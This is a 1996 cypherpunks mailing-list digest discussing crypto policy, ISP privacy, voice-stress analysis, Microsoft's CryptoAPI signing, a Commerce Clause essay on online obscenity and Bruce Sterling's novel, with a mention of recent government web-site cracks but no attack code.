(calling for restoration of nondelegation and enumerated powers doctrines).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 9 Oct 1996 06:55:03 -0700 (PDT)
To: Mail AutoResponder <abusebot@savetrees.com>
Subject: Re: Foul Language [NOISE]
In-Reply-To: <199610091201.IAA21100@cyberpromo.com>
Message-ID: <325BA853.32AC@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Mail AutoResponder wrote:
> Please do not send messages to this autoresponder using
> foul language.

I only sent you one message ever, containing not a single 
"cuss/curse/swear/foul" word at all.

But since you insist on pestering me after I told you not to, I will now 
respond with a less-than-civil directive:

Piss off, assholes.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Tunnicliffe" <Tunny@inference.com>
Date: Wed, 9 Oct 1996 07:20:27 -0700 (PDT)
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: DSP wrinkle removal (was Voice Stress Analysis of Debates?)
Message-ID: <c=US%a=_%p=Inference%l=LANDRU-961009141101Z-662@landru.novato.inference2.com>
MIME-Version: 1.0
Content-Type: text/plain


Adamsc wrote:
> On Sun, 06 Oct 1996 15:28:40 -0800, jim bell wrote:
> > >BTW, did anyone notice that some of the evening news anchors are
> > >imaged via a camera/DSP to render as more youthful (e.g., removing
> > >facial wrinkles)?

> >Really?  Where'd you hear this? I suppose it's not beyond the realm
> >of possibility, but that would be rather sophisticated programming,
> >particularly in real-time.

> One of the big anchors admitted it.  However it was only possible in
> the studio.   Might have even been a contrast-lowering gadget.

Well, I already threw it out, so I can't verify it, but I know I read an 
article on this, I'm pretty sure in last week's TV Guide.  I don't recall 
the technical details (I doubt any were presented), but someone (JYA?) 
could check last week's TV Guide and maybe even quote the article.

I'm embarrassed to have to admit to actually reading TV Guide*, especially 
to this august group...

Tunny
======================================================================
 James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
 Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
 tunny@Inference.com    |                    36 07 D9 33 3D 32 53 9C
======================================================================
* Um, I only scan it for stuff that is likely to show up as a
discussion topic on cypherpunks.  That doesn't leave much out,
of course.


begin 600 WINMAIL.DAT
M>)\^(@,.`0:0" `$```````!``$``0>0!@`(````Y 0```````#H``$(@ <`
M& ```$E032Y-:6-R;W-O9G0@36%I;"Y.;W1E`#$(`06 `P`.````S <*``D`
M!P`+``$``P#\``$@@ ,`#@```,P'"@`)``<`"P`!``,`_ `!"8 !`"$```!%
M-S,W,#=!0T0X,C!$,#$Q.3,P.3 P04$P,$$U1C8P1 `"!P$-@ 0``@````(`
M`@`!!( !`#P```!$4U @=W)I;FML92!R96UO=F%L("AW87,@5F]I8V4@4W1R
M97-S($%N86QY<VES(&]F($1E8F%T97,_*0#_% $#D 8`_ <``!H````#`"8`
M``````,`-@``````'@!P``$````B````5F]I8V4@4W1R97-S($%N86QY<VES
M(&]F($1E8F%T97,_`````@%Q``$````;`````;NUN9C[K <UM2#8$="3"0"J
M`*7V#0`,2\4N``,`+@```````P`&$)KD8"H#``<04 0``!X`"! !````90``
M`$%$04U30U=23U1%.D].4U5.+# V3T-4,3DY-C$U.C(X.C0P+3 X,# L2DE-
M0D5,3%=23U1%.D)45RQ$241!3EE/3D5.3U1)0T542$%44T]-14]&5$A%159%
M3DE.1TY%5U-!3D,``````P`0$ `````#`!$0`0````(!"1 !````Y00``.$$
M``!8!P``3%I&=3_<,NO_``H!#P(5`J0#Y 7K`H,`4!,#5 (`8V@*P'-E=&XR
M!@`&PP*#,@1&`@!P<')Q,2 (50>R`H,SAP/%$X,2(G-T96T"@"Y]"H (SPG9
M.Q<_,C4>-0* "H$-L0M@;F<Q## S%/ +`VQI,S9?#? +51+Q"_(3H&\6$&,A
M!4!!9&%M!/ @=T4<4CH*A3X@3P.@4\!U;BP@,#8>$!R1"#$Y.1ZP,34Z,@`X
M.C0P("TP.!0P,!Z :@=P(&)ECFP#(!T](<%"5%<>@%!D:60@`'!Y`B!EI"!N
M'&!I8R+P=!' S05 <P-P(O!O9B-Q(O#L978)\ N 9R,`!] $('\`<!&P!; E
M01= (5H'<&$R9PF ('8',"*0(&.#'. $D&$O1%-0(W#T;R 70&X$@2*0!" $
M8)470" BP'4C@&9U`R#@*&4N9RX>@!= !&#W)T :0"%:9@#0!S$=(0N 9&ML
M!Y I/PJ%(5A2`F4'0&QY/R @5]LD8!= )R* *7$@)& *P1<C@ 0`+C!)(\!U
M<'#";Q'P(&ET)P0@(Q&_()$BP2* )%(70 = ;2%8MR0A,"$`D&(#$#!P>1Z 
MUF(ID"-T=PA@;"* (*#O*' CH"YQ(\%P+X$C,2.@KR<1'$$)P!S@;231+"%8
M_PJQ(S$IT K +A P8 .@,;+V+2,P!X N+,X>("0',R![)/ E9V0V@ ) )Q$P
M<"[Q+D!(;W<DD07 ,' =(/\H\0(@.!$RU"QP.#$=ER12=18`=2)@;SPQ!= Z
MT&C_!4 1P"2@)(,@D4"1)X$"(7LGX!8`+1;0/( L,23P9_\[@"<`/" *BQL/
M`= M)@K[_1O58P! +E @L1Z +] '0/TQL60X(". %T 'X#SA*8'/'H CT"_!
M)Z!N)P5 /*'?!I X(4AQ,Z(OT&LC$ ?@_R_01V(BD271(S$^`0(@+V/]1P$G
M(( 3H!(`,V OX2E!7SA!"V 6`!T@">!K,)%4\%8@1W4B<"H0+D OT/YD`B!)
M(1= )Z @P212''&^: ,`3Z$B4!(`"W!L!"#R*$\"=6(%0"*A3=$I0>],H1'P
M`C )@"DSA"/2(M+ *$I903\I02$T4OL1L 60:TV/3I(BD2* `,#F>3210'-Q
M=1QA)$-+5?<Y#4QB%B!B"L!!<1'P,5&_*&! (RA1.X-:TQR0=2WRMTK#)-).
M5BH>@ >0< 60'P<Q.!$H42]R(I!U9W5G54$)P A@<"Y?4"S,5/<>8"*P1-4]
M82]B/V-/9%^R/435($HGL00@03PPMV!B2X$&D&8B\"Y ?"Y0,6>096(Z+Q "
M0' ZZ"\O=VAP+@N 9R H@<4C4"X%H&TO?C\P8(CW+\!HQA/A<C @-,$_8 .@
MZ6=A4$<H,$8DT020$Z -"X!T9^ N0$-!(#(H,R!%$B!&;7!!0\UM4$0>D&X`
M-S=EAFFC_D!J=VE"/Y%G87"O+D!#L&$>D#<@1#EQT&UP,Y5N,#,2(#5M<#E#
M8+\/=%]U;W9_9/XJ(%5M_T<"/5,$\ .1/.$"$#41/S!O#= C=%YA0Y!K(+!=
M\W/O)9 'X# `*.)A1-4B8 3P/U[ `)!+TC5 (T!+PF-YIS50;($>8&MS/#%4
M(Y*?3R 'D$D2+'! ,FUU$;!_2$-$U20A5&$1X3D&%F$``8)P````0 `Y`# J
M)[/KM;L!`P#Q/PD$```"`4<``0```# ```!C/553.V$](#MP/4EN9F5R96YC
M93ML/4Q!3D1252TY-C$P,#DQ-#$Q,#%:+38V,@`"`?D_`0```$H`````````
MW*= R,!"$!JTN0@`*R_A@@$`````````+T\]24Y&15)%3D-%+T]5/4Y/5D%4
M3R]#3CU214-)4$E%3E13+T-./5153DY9````'@#X/P$````5````2F%M97,@
M02X@5'5N;FEC;&EF9F4``````@'[/P$```!*`````````-RG0,C 0A :M+D(
M`"LOX8(!`````````"]//4E.1D5214Y#12]/53U.3U9!5$\O0TX]4D5#25!)
M14Y44R]#3CU454Y.60```!X`^C\!````%0```$IA;65S($$N(%1U;FYI8VQI
M9F9E`````$ `!S!P`$,XZK6[`4 `"#!PV8*SZ[6[`0,`#33]/P```@$4- $`
M```0````5)2AP"E_$!NEAP@`*RHE%QX`/0`!`````0`````````+`"D`````
M``L`(P```````@%_``$```!/````/&,]55,E83U?)7 ]26YF97)E;F-E)6P]
M3$%.1%)5+3DV,3 P.3$T,3$P,5HM-C8R0&QA;F1R=2YN;W9A=&\N:6YF97)E
-;F-E,BYC;VT^``#M2C$T
`
end




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 9 Oct 1996 07:42:00 -0700 (PDT)
To: Vin McLellan <vin@shore.net>
Subject: Re: Voice Stress Analysis of Debates?
In-Reply-To: <v02130511ae80cb8ea1a6@[198.115.177.224]>
Message-ID: <325BB998.5255@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Vin McLellan wrote:
> Jim Bell queried the List about potential AP decision-support tools
> like voice-stress detectors which could identify truth-tellers among
> politicians and other possible candidates for Mr. Bell's much-debated
> proposal to cleanse the body politic.   One anon C'punker responded
> with a fine terse summary of VS/PSE tech (along with the surprising
> news that VS/PSE chips are now available at $89.95 per.)
> Another, Sandy Sandfort, noted:

[text stating in effect that VS/PSE is essentially useless deleted]

The technical info is very much appreciated, by myself and subscribers 
as well, presumably.  However, to suggest from the examples cited that 
this technology is near useless sounds more like yet another govt. 
smokescreen for their next-level technology, if you know what I mean, 
and I think you do.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ravi Pandya <rpandya@netcom.com>
Date: Wed, 9 Oct 1996 08:28:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Microsoft CAPI
Message-ID: <2.2.32.19961009152246.006be444@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>From today's HotWired Packet http://www.packet.com:

"Today Microsoft is using similar technology as part of its Cryptography
API: You can't load an encryption engine into Windows 95 or Windows NT
unless that engine has been specially signed by Microsoft's corporate key.
The reason for this restriction, says the company, is the Clinton
administration: Microsoft couldn't have gotten export permission for its
operating systems if users could easily plug in crypto engines that hadn't
been approved. "

This is disturbing, if true, though I suspect there is also a less ominous
reason: you certainly want your cryptography provider to be trusted, and you
want to be sure the code has not been altered. The implications really
depend on Microsoft's policy on signing cryptography engines, and whether
they allow a way to delegate signature authority.

Ravi





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 9 Oct 1996 06:25:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: OUR_say
Message-ID: <1.5.4.16.19961009132326.34f70ad0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-8-96. BuWi:

   "OURS releases Internet security white paper"

      The new white paper, titled "Recommendations for
      Providing Secure Business Services over External
      Networks," is the industry's first objective,
      comprehensive tool for businesses evaluating security
      options for conducting business -- including
      advertising, sensitive information services and
      electronic commerce -- on unsecured networks, such as
      the Internet.

      It represents the experience and foresight of over 25 of
      the industry's leading information technology users and
      vendors, including: American Express, Chase Manhattan
      Bank, Bellcore, Digital Equipment Corp., Levi Strauss,
      Motorola, Novell, Pacific Gas & Electric, Phillips
      Petroleum, SunTrust Banks and Union Camp as well as
      experts within the industry at large.

      The paper is priced at $49.95 and is available
      immediately by calling the OURS headquarters at
      312/527-6782. The executive summaries of this new white
      paper, and 11 others from OURS, are available for free
      by going to the OURS Web page at http:\\www.ours.org.

   -----

   http://jya.com/oursay.txt  (7 kb)

   ftp://jya.com/pub/incoming/oursay.txt

   OUR_say


----------


We'll get the paper, and if it's worthy, put it on the Web, dirt cheap.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Shawn Willden <swillden@cs.weber.edu>
Date: Wed, 9 Oct 1996 08:31:03 -0700 (PDT)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Missionaries
In-Reply-To: <9610081444.AA23161@hydra.cde.x.org>
Message-ID: <325BC51A.4BF3@cs.weber.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn wrote:
> 
> Stephen Humble wrote:
> > Biblical creationism is "wrong": there's ample evidence that the
> > Earth is *much* more than 6000 years old.  Yet lots of seemingly
> > rational people believe biblical creationism.
> 
> Which years?  The very definition of the Christian God encompasses all
> ultimate things, including the ability to make the Earth look like 
> it's billions of years old, with *all* "evidence" in place.

And Christian theology also offers an explanation as to why God would do
such a thing: so that faith is required for belief.

Logic is of no use in theological discussions.  Not because people are
incapable of understanding or applying it, but because they have already
applied it.  Given its own definitions and axioms, every belief system
I've encountered is pretty rational, and I've dealt with more than a
few.  As a Mormon missionary I spent quite a bit of time discussing
theology with people :-)

Shawn.

--
Shawn Willden
swillden@cs.weber.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Filacchione <alexf@iss.net>
Date: Wed, 9 Oct 1996 06:39:34 -0700 (PDT)
To: "stewarts@ix.netcom.com>
Subject: RE: Recent Web site cracks
Message-ID: <01BBB5C5.AAE46460@alexf.iss.net>
MIME-Version: 1.0
Content-Type: text/plain




----------
From: 	stewarts@ix.netcom.com[SMTP:stewarts@ix.netcom.com]
Sent: 	Tuesday, October 08, 1996 12:37 PM
To: 	pjb@ny.ubs.com
Cc: 	cypherpunks@toad.com
Subject: 	Re: Recent Web site cracks

At 09:46 AM 10/8/96 -0400, pjb@ny.ubs.com wrote:
>The recent cracks of the DOJ, CIA and Dole web sites have caused me to think 
>about just what is going on here.
>
>Do you suppose that these entries were made via the httpd route, maybe via 
>cgi-bin, or just a straight telnet-type entry to the server?  I don't know 
>what operating systems were involved with these three systems, or even if

The DOJ and CIA sites were actually cracked; don't know the mechanisms.


=-=-=-=-=-

Apparently it was the ole phf bug.  Or so I've heard.

Alex F
alexf@iss.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 9 Oct 1996 10:03:57 -0700 (PDT)
To: cypherpunks@toad.com
Subject: "Forward Privacy" for ISPs and Customers
In-Reply-To: <199610082336.QAA24221@mail.pacifier.com>
Message-ID: <v03007802ae819385a300@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


IANAL, and I have been skimmming over most of the Bell v. Unicorn v. Nuri
debates about the legality of wiretapping, but something jumped out at me:

At 1:37 AM -0400 10/9/96, Black Unicorn wrote:

>include ISPs.  Constitutional arguments that ISPs are somehow different
>from phone companies and therefore not required to comply with wiretap
>orders?  Good luck.
>
>I know its fun to make the argument that ISPs and E-mail and NetPhone are
>all new technologies and so it must be unconstitutional to regulate them
>but the amusement in these cases stems from a wish that it was so, not
>fact or reason.

I agree that ISPs look a lot like phone companies for the purposes of
regulations and wiretaps. My ISP sells me some connectivity, sends me a
bill, etc.

Thus, if it is constitutionally OK (a technical term) for courts to order
phone logs to be turned over to law enforcement, why not logs of e-mail? Or
logs of Web sites visited, for example? I see no basis for a special
distinction. Records are records, and businesses routinely have to turn
over various records under court order.

However, there are certain things my phone company does *not* do. They
don't keep _copies_ (recordings) of my phone conversations. This means a
court order can't yield copies of past conversations. They also don't track
incoming phone calls to me. (I don't believe such records of incoming phone
calls are kept; maybe I'm wrong. Certainly with Caller ID, storing incoming
phone numbers is possible....I just don't think local or regional phone
companies care about such records, and hence don't bother to accumulate
them.)

Now, should the phone company keep such records, they would be accessible
via court order.

My point? ISPs are currently in a position to turn over *far* more
information than phone companies are able to turn over. It's as if the
phone companies kept audio recordings of all conversations, without even
the need for law enforcement to do a wiretap or pen register or whatnot. It
would be trivial for law enforcement to say: "Phone Company, here's a
subpoena/court order for the last 6 months of phone conversations Tim May
has had. Please ship the tapes via FedEx."

This makes the ISP case a bit different. Not legally, but technologically.

There are some fixes.

Something ISPs could do--and may do if there is sufficient customer
pressure--is to adopt a policy of "forward secrecy" (to slightly abuse this
technical term). That is, to have an explicit policy--implemented in the
software--of _really_ deleting the back messages once a customer downloads
them to his site. This means that _backups_ must be done in a careful
manner, such that even the backup tapes or disks are affected by a removal.

(Recall that Ollie North thought he had deleted his incriminating White
House PROFS messsages, but that they were faithfully preserved on backup
tapes, and could be retrieved.)

My Eudora Pro mail programs sucks down messages from my ISP and, as yours
probably does, tells the ISPs mail server to delete it upon downloading. An
option for users could be something like "Don't make longterm backups of my
account, and leave no copies whatsoever once I have downloaded my messages."

This would make the job of a law enforcement or TLA a lot more difficult
than it is now, where the e-mail and logs are ready to be handed over on a
silver platter, all nicely accumulated and human-readable.

Back to the legal issue. Perhaps the Digital Telephony Act will be
interpreted to require ISPs to make their systems "tappable," possibly by
adding message logging. possibly just by offering access to the T1s and T3s
only ("OK, Feds, here's where the T3 enters the building...be careful you
don't cut the core, OK?").

But if no logs and backup tapes of mail are kept, at least the job of
gaining access to communications is made more difficult.

And, I'm sure the lawyers will agree, while ISPs may be treated essentially
the same as telephone companies, absolutely *nothing* requires either to
keep specific kinds of account records (*), to "know their customer" (a la
banking laws, supposedly), or to record all traffic.

(* Prepaid phone cards, paid for in cash, and payphones, tell us that True
Names are not needed with the phone companies. And so on.)

We don't have to make it easy for them.

--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ratak (Jason E.J. Manaigre) <ratak@escape.ca>
Date: Wed, 9 Oct 1996 08:19:40 -0700 (PDT)
To: jubois@netcom.com
Subject: Re: pgp, edi, s/mime
Message-ID: <199610091521.KAA26969@wpg-01.escape.ca>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: jubois@netcom.com, cypherpunks@toad.com
Date: Wed Oct 09 10:19:39 1996
t:
> 
> - S/MIME and PGP are the two leading candidates for encrypting EDI
>  messages,
> S/MIME inside the US, and PGP outside the US where S/MIME is unavailable.
>   

        How far along has S/Mime come now, can they offer the same key sizes 
as PGP...?




___________________________________________________________________
GarGoyle Securities
- -Intrusion Assessment Systems
- -Security Consultation/Education/Curriculum Development
- -Project Management/Research/Analysis World Wide...
- -Member of CITDC (Canadian International Trade Development Council)
- -Email: ratak@GargSec.mb.ca (Jason E.J. Manaigre)
- -Web:   www.GargSec.mb.ca
- -Email for PGP key with phrase 'Get Public Key' as Subject
- -2048 PGPKey iD E2 FA 30 E5 F5 AD EC F3  00 9A 9D 33 59 FC DF AD
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMlvCj/qtmO8M92GRAQFNBAf8CVzTxtle7jvTQFq6UM9MpEGjvrnoSHoO
NMidciwyht0AqyGNPqNxczU/arpCAQwluwkhtTRor8lYsUWLLLyZB8d2DGs1i/En
3dE4WIXnNSR/G4YjHf8ln/DwE+YbHHFwEve5zSJAf4Gnvt7+LRo+VJPq34MaJgyc
5888BrSMHKTo5pyISAz+LQhDJptWMZwPsldrZctWI0QW/xgFMCmZr8qt2VYWdlZw
XO+Px+QadwvNJlL8pR2ZT3l458rzU5B7kS3CKVJDl0iUlVWK2/xHiuRUHfo1Yu1Z
VB6jFEw6IsQI8ukrANu90qgDcab3YQpe99BQCd/imZfKWSzO3vsieQ==
=Ew/I
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Wed, 9 Oct 1996 10:31:40 -0700 (PDT)
To: anonymous@miron.vip.best.com
Subject: Tim May is a person
In-Reply-To: <199610082321.QAA01224@miron.vip.best.com>
Message-ID: <199610091730.KAA04285@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



I really don't care if Tim May is a child molestor, a NSA spy, or Mother
Teresa.  The only important point is that he expresses ideas on this list.

I have disagreed with him at times, and I have agreed with him at times,
and I have, at times, discarded messages from him that I simply do not
care about.

All of these messages about whether Tim is good or evil is irrelevant.
He brings up issues and challenge other issues, and what he says should
be viewed as-is, without any consideration of what he does away from his
keyboard (unless that is the topic).

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Wed, 9 Oct 1996 07:34:34 -0700 (PDT)
To: "Cypherpunks" <dlv@bwalk.dm.com>
Subject: RE: Recent Web site cracks
Message-ID: <n1367265045.78480@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


Which firewalls did they use, what are the holes, and how can you plug and/or
exploit them?

PM

_______________________________________________________________________________
From: Dr.Dimitri Vulis KOTM on Wed, Oct 9, 1996 3:20
Subject: Re: Recent Web site cracks
To: cypherpunks@toad.com

stewarts@ix.netcom.com writes:
> The DOJ and CIA sites were actually cracked; don't know the mechanisms.

They used firewalls that are known to be easily crackable.
          ^^^^^^^^^^                     ^^^^^^^^^^^^^^^^
---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

------------------ RFC822 Header Follows ------------------
Received: by mail.ndhm.gtegsc.com with SMTP;9 Oct 1996 03:20:19 -0400
Received: from toad.com by delphi.ndhm.gtegsc.com with SMTP;
          Wed, 9 Oct 1996 7:17:16 GMT
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id QAA26393 for
cypherpunks-outgoing; Tue, 8 Oct 1996 16:51:04 -0700 (PDT)
Received: from uu.psi.com (uu.psi.com [136.161.128.3]) by toad.com
(8.7.5/8.7.3) with SMTP id QAA26380 for <cypherpunks@toad.com>; Tue, 8 Oct
1996 16:50:40 -0700 (PDT)
Received: by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via UUCP;
        id AA00949 for ; Tue, 8 Oct 96 19:43:02 -0400
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Tue, 08 Oct 96 16:54:14 EDT
	for cypherpunks@toad.com
To: cypherpunks@toad.com
Subject: Re: Recent Web site cracks
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Comments: Dole/Kemp '96!
Message-Id: <9VZHVD1w165w@bwalk.dm.com>
Date: Tue, 08 Oct 96 16:53:43 EDT
In-Reply-To: <199610081636.MAA10912@attrh1.attrh.att.com>
Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y.
Sender: owner-cypherpunks@toad.com
Precedence: bulk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Wed, 9 Oct 1996 10:43:07 -0700 (PDT)
To: nobody@cypherpunks.ca (John Anonymous MacDonald)
Subject: Re: Porn and commerce
Message-ID: <v0213050bae812b2d48ff@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>           Copyright (c) Virginia Law Review Association 1996.
>                           Virginia Law Review
>
>                              April, 1996
>
>                           82 Va. L. Rev. 535
>
>ESSAY: VIRTUAL REALITY AND "VIRTUAL WELTERS": A NOTE ON THE COMMERCE
>             CLAUSE IMPLICATIONS OF REGULATING CYBERPORN
>
>                        Glenn Harlan Reynolds
>
>    In recent months, there has been a great deal of publicity regarding
>the availability of pornography over the Internet and other computer
>networks, along with proposals for regulation. n1 Recent months have
>also seen the prosecution of one couple, located in California, by
>authorities in Memphis, Tennessee, for the contents of a computer
>bulletin board they operated. n2 According to media accounts, the Memphis
>location was chosen for its conservative juries, who were expected to be
>unsympathetic to Bay Area pornographers. n3 No doubt more such
>prosecutions, by both federal and state and local authorities, are on the
>horizon.
>
>    As the first of its kind, this prosecution raises interesting
>questions regarding the appropriateness and nature of "community
>standards" n4 developed to deal with local entities like bookstores n5
>and movie theaters n6 as applied to almost locationless entities such as
>computer bulletin board systems. Indeed, the American Civil Liberties
>Union has argued in court that the appropriate community standard for
>such cases is that of the online community, rather than of any particular
>geographic area. n7
>
>    My point here, though, is a narrower one: that we need not even
>reach the First Amendment to discover serious difficulties with
>locality-based regulation of computer bulletin board systems. Instead, we
>may look to the Supreme Court's Commerce Clause jurisprudence for some
>useful guidance on the inappropriateness of such regulation. Only where
>regulations pass the Commerce Clause test is it even necessary to address
>First Amendment issues, and, as I will suggest, even there the test
>provides significant guidance.
>
[snip]
>
>    These cases, and the principles that lie behind them, raise two
>important points. Most obviously, it would appear that state or local
>regulation of communication over computer networks on obscenity grounds
>is very likely a violation of the dormant Commerce Clause because of the
>variations produced by the community standards doctrine. After all, if it
>is too much of a burden for interstate merchandisers to keep track of
>variations in state sales tax rates and classifications, it certainly
>must be too great a burden for interstate publishers to keep track of
>variations in the far less certain "community standards" of obscenity and
>indecency.
>
>    The second and perhaps more important point is that if we are willing to
>grant interstate sellers of office equipment and porcelain "collector"
>dolls such extensive protection from local interference in the name of
>protecting commerce, surely we should be even more willing to provide such
>protection in the name of free speech. For the protection provided by the
>dormant Commerce Clause is merely a matter of judicial inference; the
>value of a free press, on the other hand, is explicitly spelled out in
>the First Amendment.
>
>    Such an approach would, of course, limit the ability of communities to
>develop unique standards of obscenity, and move us closer toward a
>uniform national standard. n18 While that development is not without its
>drawbacks,neither are the many other movements toward uniformity
>mandated by the Constitution. But we have accepted them nonetheless. n19
>
>    Taking this approach seriously would mean barring prosecutions,
>under state or local law, of out-of-state individuals and entities for
>obscenity where the material in question came via computer connections. More
>interestingly, it would also mean that courts should regard even federal
>prosecutions that employ local community standards with a considerable
>degree of suspicion. For while Congress is generally regarded as having
>the power to override dormant Commerce Clause considerations through
>appropriate legislation, we should be reluctant to assume that it has
>done so by implication, simply because of the existence of federal
>criminal laws. n20 The idea of a national market, after all, is one that
>Congress may override through the passage of appropriate legislation,
>n21 but that is a far cry from saying that federal prosecutors should be
>able to do the same.
>
>    Whether my suggestion will be taken seriously, on the other hand,
>is an open question at best. For one thing, it must overcome the natural
>tendency of academics, journalists, and judges to rush to the First
>Amendment whenever an issue involving speech or publication appears. For
>another, it must overcome the equally natural tendency to forget that
>parts of the Constitution outside the Bill of Rights  - even the Commerce
>Clause - may serve as important guarantors of liberty. And aside from
>these hurdles, it requires a recognition, that there is still a role for
>the nationalist parts of the Constitution, despite today's resurgence of
>interest in the powers of states and in dlimitations on the federal
>government. n22
>
>    Despite all of these trends and tendencies, I think that there is
>still room to ask whether it is appropriate, or even constitutional, to
>allow states to govern expression under circumstances in which they would
>not be permitted to collect sales taxes on sales of Elvis dolls or K-Tel
>merchandise. Where it has been necessary, we have managed to update our
>view of the Constitution to accommodate changes in technology. It is time
>that we do so again.
>

It seems these arguments raise yet a third point.  It seems that one could
quite easily extend the 'Commerce Clause' to beyond our own borders and
infer that countries have no right to regulate Net commerce from servers
which originate outside their borders.  It seems a key question hinges on
the 'source' of authority for the laws of countries, which most would claim
is their NATURAL and INALIENABLE SOVERIGNTY insofar as matters of commerce
and diplomacy are concerned.  But should one country have the legal right
to regulate the commerce of parties with no physical presence within their
borders?  After all, if it is reasonable to assume too much of a burden for
interstate merchandisers to keep track of variations in state sales tax
rates and classifications for interstate publishers to keep track of
variations in the far less certain "community standards" of obscenity and
indecency, on what NATURAL basis should the U.S. (or for that matter any
country) attempt to impose such national burdens on international
merchandisers and publishers?




PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   |
Sacred Cow Meat Co.       |
---------------------------------------------------------------------

Counter-cultural technology development our specialty.

Vote Libertarian.

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Wed, 9 Oct 1996 11:00:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [BOOK][CYPHERPUNK] "Holy Fire"
Message-ID: <199610091800.LAA22889@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Bruce Sterling has a new cyber/cypherpunk novel, "Holy Fire" (ISBN
0-553-09958-2). Enclosed are a few exerpts, I'll lead with the
"list appropriate" one.

Brian



 "This was a very unhappy interface. And small wonder. No doubt
this entire virtual environment was being encrypted, decrypted,
reencrypted, anonymously routed through satelites and cables,
emulated on alien machinery through ill-fitting, out-of-date
protocols, then displayed through long-dead graphics standards.
Dismembered, piped, compressed, packeted, unpacketed, decompressed,
unpiped and re-membered. Worse yet, the place was old. Virtual
buildings didn't age like physical ones, but they aged in subtle
pathways of arcane decline, in much the way that their owners did.
A little bijou table in the corner had a pronounced case of bit-
rot: from a certain angle it lost all surface tint."



 "Attendants opened the hinged white lid of the emulsifier, took
the thin shroud from Martin's wasted, puckered body, and slid him, 
with reverent care, feetfirst into the seething gel. The scanners
set to work, Martin's final official medical imaging. Gentle
ultrasonics shook the body apart, and when the high-speed rotors
began to churn, the emulsifier's ornamental flowerbeds trembled a
bit. Autopsy samplers caught up bits of the soup, analyzed genetic
damage, surveyed the corpse's populations of resident bacteria,
hunted down and cataloged every subsymptomatic viral infection and
prion infestation, and publicly nailed down the cause of death
(self-administered neural depressant) with utter cybernetic
certainty. All the data was neatly and publicly filed on the net."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 9 Oct 1996 11:18:12 -0700 (PDT)
To: sandfort@crl.com>
Subject: Re: Voice Stress Analysis of Debates?
Message-ID: <199610091817.LAA02321@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:29 AM 10/9/96 -0400, Vin McLellan wrote:
>        Jim Bell queried the List about potential AP decision-support tools
>like voice-stress detectors which could identify truth-tellers among
>politicians and other possible candidates for Mr. Bell's much-debated
>proposal to cleanse the body politic. 

